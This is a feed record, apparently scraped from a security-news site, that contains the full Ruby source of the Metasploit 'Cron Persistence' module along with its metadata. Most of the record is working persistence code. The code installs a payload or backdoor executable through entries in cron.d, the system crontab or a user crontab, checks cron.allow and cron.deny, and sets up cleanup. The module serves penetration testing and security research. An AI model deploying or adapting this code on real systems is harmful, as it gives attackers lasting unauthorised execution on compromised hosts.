{“lastseen”:”2025-09-18T19:49:09″,”description”:”This module will create a cron or crontab entry to execute a payload. The module includes the ability to automatically clean up those entries to prevent multiple executions. …”,”published”:”2025-09-18T18:52:48″,”modified”:”2025-09-18T18:52:48″,”type”:”metasploit”,”title”:”Cron Persistence”,”source”:””,”references”:””,”id”:”MSF:EXPLOIT-MULTI-PERSISTENCE-CRON-“,”bulletinFamily”:”exploit”,”cwe”:null,”cvelist”:[],”sourceData”:”##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Exploit::Local\\n Rank = ExcellentRanking\\n\\n include Msf::Post::File\\n include Msf::Post::Unix\\n include Msf::Exploit::EXE # for generate_payload_exe\\n include Msf::Exploit::FileDropper\\n include Msf::Exploit::Local::Persistence\\n prepend Msf::Exploit::Remote::AutoCheck\\n include Msf::Exploit::Deprecated\\n moved_from ‘exploits\/linux\/local\/cron_persistence’\\n\\n def initialize(info = {})\\n super(\\n update_info(\\n info,\\n ‘Name’ =\\u003e ‘Cron Persistence’,\\n ‘Description’ =\\u003e %q{\\n This module will create a cron or crontab entry to execute a payload.\\n The module includes the ability to automatically clean up those entries to prevent multiple executions.\\n syslog will get a copy of the cron entry.\\n Verified on Ubuntu 22.04.1, MacOS 13.7.4\\n },\\n ‘License’ =\\u003e MSF_LICENSE,\\n ‘Author’ =\\u003e [\\n ‘h00die \\u003cmike@shorebreaksecurity.com\\u003e’\\n ],\\n ‘Platform’ =\\u003e [‘unix’, ‘linux’, ‘osx’],\\n ‘Targets’ =\\u003e [\\n [ ‘Cron’, { path: ‘\/etc\/cron.d’ } ],\\n [ ‘User Crontab’, { path: ‘\/var\/spool\/cron\/crontabs’ } ],\\n [ ‘OSX User Crontab’, { path: ‘\/var\/at\/tabs\/’ } ],\\n [ ‘System Crontab’, { path: ‘\/etc\/crontab’ } ]\\n ],\\n ‘DefaultTarget’ =\\u003e 1,\\n ‘Arch’ =\\u003e [\\n ARCH_CMD,\\n ARCH_X86,\\n ARCH_X64,\\n ARCH_ARMLE,\\n ARCH_AARCH64,\\n ARCH_PPC,\\n ARCH_MIPSLE,\\n ARCH_MIPSBE\\n ],\\n ‘SessionTypes’ =\\u003e [ ‘shell’, ‘meterpreter’ ],\\n ‘DisclosureDate’ =\\u003e ‘1979-07-01’, # Version 7 Unix release date (first cron implementation)\\n ‘References’ =\\u003e [\\n [‘ATT\\u0026CK’, Mitre::Attack::Technique::T1053_003_CRON]\\n ],\\n ‘Notes’ =\\u003e {\\n ‘Stability’ =\\u003e [CRASH_SAFE],\\n ‘Reliability’ =\\u003e [REPEATABLE_SESSION, EVENT_DEPENDENT],\\n ‘SideEffects’ =\\u003e [ARTIFACTS_ON_DISK, CONFIG_CHANGES]\\n }\\n )\\n )\\n\\n register_options(\\n [\\n OptString.new(‘USER’, [false, ‘User to run cron\/crontab as’, ”], conditions: [‘Targets’, ‘in’, [‘User Crontab’, ‘OSX User Crontab’]]),\\n OptString.new(‘TIMING’, [false, ‘Cron timing. Changing will require WfsDelay to be adjusted’, ‘* * * * *’]),\\n OptString.new(‘PAYLOAD_NAME’, [false, ‘Name of the payload file to write’]),\\n ]\\n )\\n end\\n\\n def check\\n # https:\/\/gist.github.com\/istvanp\/310203 for cron regex validator\\n cron_regex = ‘(\\\\*|[0-5]?[0-9]|\\\\*\\\\\/[0-9]+)\\\\s+’\\n cron_regex \\u003c\\u003c ‘(\\\\*|1?[0-9]|2[0-3]|\\\\*\\\\\/[0-9]+)\\\\s+’\\n cron_regex \\u003c\\u003c ‘(\\\\*|[1-2]?[0-9]|3[0-1]|\\\\*\\\\\/[0-9]+)\\\\s+’\\n cron_regex \\u003c\\u003c ‘(\\\\*|[0-9]|1[0-2]|\\\\*\\\\\/[0-9]+|jan|feb|mar|apr|may|jun|jul|aug|sep|oct|nov|dec)\\\\s+’\\n cron_regex \\u003c\\u003c ‘(\\\\*\\\\\/[0-9]+|\\\\*|[0-7]|sun|mon|tue|wed|thu|fri|sat)’ # \\\\s*\\n # cron_regex \\u003c\\u003c ‘(\\\\*\\\\\/[0-9]+|\\\\*|[0-9]+)?’\\n\\n return CheckCode::Unknown(‘Invalid timing format’) unless datastore[‘TIMING’] =~ \/#{cron_regex}\/\\n\\n return CheckCode::Safe(\\”#{target.opts[:path]} doesn’t exist\\”) unless exists?(target.opts[:path])\\n # it may not be directly writable, but we can use crontab to write it for us\\n if !writable?(target.opts[:path]) \\u0026\\u0026 !command_exists?(‘crontab’)\\n return CheckCode::Safe(\\”Can’t write to: #{target.opts[:path]} or crontab not found\\”)\\n end\\n\\n if target.name == ‘User Crontab’ \\u0026\\u0026 !user_cron_permission?(target_user)\\n return CheckCode::Unknown(‘User denied cron via cron.deny’)\\n end\\n\\n CheckCode::Appears(‘Cron timing is valid, no cron.deny entries found’)\\n end\\n\\n def target_user\\n return datastore[‘USER’] unless datastore[‘USER’].blank?\\n\\n whoami\\n end\\n\\n def user_cron_permission?(user)\\n # double check we’re allowed to do cron\\n # may also be \/etc\/cron.d\/\\n paths = [‘\/etc\/’, ‘\/etc\/cron.d\/’]\\n paths.each do |path|\\n if readable?(\\”#{path}cron.allow\\”)\\n cron_auth = read_file(\\”#{path}cron.allow\\”)\\n if cron_auth \\u0026\\u0026 (cron_auth =~ \/^ALL$\/ || cron_auth =~ \/^#{Regexp.escape(user)}$\/)\\n vprint_good(\\”User located in #{path}cron.allow\\”)\\n return true\\n end\\n end\\n next unless readable?(\\”#{path}cron.deny\\”)\\n\\n cron_auths = read_file(\\”#{path}cron.deny\\”)\\n if cron_auths \\u0026\\u0026 cron_auth =~ \/^#{Regexp.escape(user)}$\/\\n vprint_error(\\”User located in #{path}cron.deny\\”)\\n return false\\n end\\n end\\n # no guidance, so we should be fine\\n true\\n end\\n\\n def install_persistence\\n cron_entry = datastore[‘TIMING’]\\n cron_entry += \\” #{target_user}\\” unless [‘User Crontab’, ‘OSX User Crontab’].include?(target.name)\\n if payload.arch.first == ‘cmd’\\n payload_info[‘BadChars’] = \\”#%\\\\x10\\\\x13\\”\\n cron_entry += \\” #{regenerate_payload.encoded}\\”\\n payload_info.delete(‘BadChars’)\\n else\\n file_name = datastore[‘PAYLOAD_NAME’] || Rex::Text.rand_text_alpha(5..10)\\n backdoor = \\”#{writable_dir}\/#{file_name}\\”\\n vprint_status(\\”Writing backdoor to #{backdoor}\\”)\\n upload_and_chmodx backdoor, generate_payload_exe\\n cron_entry += \\” #{backdoor}\\”\\n end\\n\\n case target.name\\n when ‘Cron’\\n our_entry = Rex::Text.rand_text_alpha(8..15)\\n write_file(\\”#{target.opts[:path]}\/#{our_entry}\\”, \\”#{cron_entry}\\\\n\\”)\\n vprint_good(\\”Writing #{cron_entry} to #{target.opts[:path]}\/#{our_entry}\\”)\\n @clean_up_rc \\u003c\\u003c \\”rm #{target.opts[:path]}\/#{our_entry}\\\\n\\”\\n\\n when ‘System Crontab’\\n file_to_clean = target.opts[:path].to_s\\n crontab_backup = store_crontab_backup(file_to_clean, ‘system crontab backup’)\\n\\n append_file(file_to_clean, \\”\\\\n#{cron_entry}\\\\n\\”)\\n vprint_good(\\”Writing #{cron_entry} to #{file_to_clean}\\”)\\n @clean_up_rc \\u003c\\u003c \\”upload #{crontab_backup} #{file_to_clean}\\\\n\\”\\n\\n when ‘User Crontab’, ‘OSX User Crontab’\\n path = target.opts[:path]\\n if !writable?(path)\\n print_status(\\”Utilizing crontab since we can’t write to #{path}\\”)\\n cmd_exec(\\”echo \\\\\\”#{cron_entry}\\\\\\” | crontab -\\”)\\n else\\n file_to_clean = \\”#{path}\/#{target_user}\\”\\n\\n crontab_backup = store_crontab_backup(file_to_clean, ‘user crontab backup’)\\n append_file(file_to_clean, \\”\\\\n#{cron_entry}\\\\n\\”)\\n vprint_good(\\”Writing #{cron_entry} to #{file_to_clean}\\”)\\n # at least on ubuntu, we need to reload cron to get this to work\\n vprint_status(‘Reloading cron to pickup new entry’)\\n\\n cmd_exec(‘service cron reload’) if target.name == ‘User Crontab’\\n @clean_up_rc \\u003c\\u003c \\”upload #{crontab_backup} #{file_to_clean}\\\\n\\”\\n end\\n end\\n print_good(‘Payload will be triggered when cron time is reached’)\\n end\\n\\n def store_crontab_backup(path, desc)\\n crontab_backup_content = read_file(path)\\n location = store_loot(\\”crontab.#{path.split(‘\/’).last}\\”,\\n ‘text\/plain’, session, crontab_backup_content,\\n path.split(‘\/’).last, desc)\\n vprint_good(\\”Backed up #{path} to #{location}\\”)\\n location\\n end\\nend\\n”,”sourceHref”:”https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/exploits\/multi\/persistence\/cron.rb”,”cvss”:{“score”:0,”severity”:”NONE”,”vector”:”NONE”,”version”:”NONE”},”cvss2″:{},”cvss3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””,”cvssV3″:{“version”:””,”vectorString”:””,”baseScore”:0,”baseSeverity”:””,”attackVector”:””,”attackComplexity”:””,”privilegesRequired”:””,”userInteraction”:””,”scope”:””,”confidentialityImpact”:””,”integrityImpact”:””,”availabilityImpact”:””}},”href”:”https:\/\/www.rapid7.com\/db\/modules\/exploit\/multi\/persistence\/cron\/”,”category_name”:”Exploit”,”post_link”:””,”product”:””,”version”:””,”vendor”:””,”ai_description”:””,”ai_severity”:””,”ai_vendor”:””,”ai_product”:””,”ai_version”:””,”ai_score”:0}<\/p>\n","protected":false},"excerpt":{"rendered":"
{“lastseen”:”2025-09-18T19:49:09″,”description”:”This module will create a cron or crontab entry to execute a payload. The module includes the ability to automatically clean up those entries to…<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,12,169,13,33,7,11,5],"class_list":["post-18006","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-exploit","tag-metasploit","tag-news","tag-none","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"\n